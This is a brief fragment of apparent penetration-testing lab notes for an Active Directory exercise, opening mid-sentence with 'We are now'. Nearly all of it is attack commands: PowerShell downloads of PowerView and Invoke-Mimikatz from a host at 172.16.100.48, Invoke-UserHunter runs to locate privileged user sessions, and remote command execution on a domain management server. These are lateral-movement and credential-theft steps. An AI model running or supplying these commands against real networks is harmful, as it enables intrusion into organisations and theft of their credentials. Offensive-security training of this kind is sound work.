We are now
powershell iwr <http://172.16.100.48/PowerView.ps1> -outfile C:\Temp\PowerView.ps1
Invoke-UserHunter

Invoke-UserHunter -CheckAccess

Invoke-Command -ScriptBlock {whoami;hostname;ipconfig} -ComputerName dcorp-mgmt.dollarcorp.moneycorp.local
powershell iwr <http://172.16.100.48/Invoke-Mimikatz.ps1> -outfile c:\temp\Invoke-Mimikatz.ps1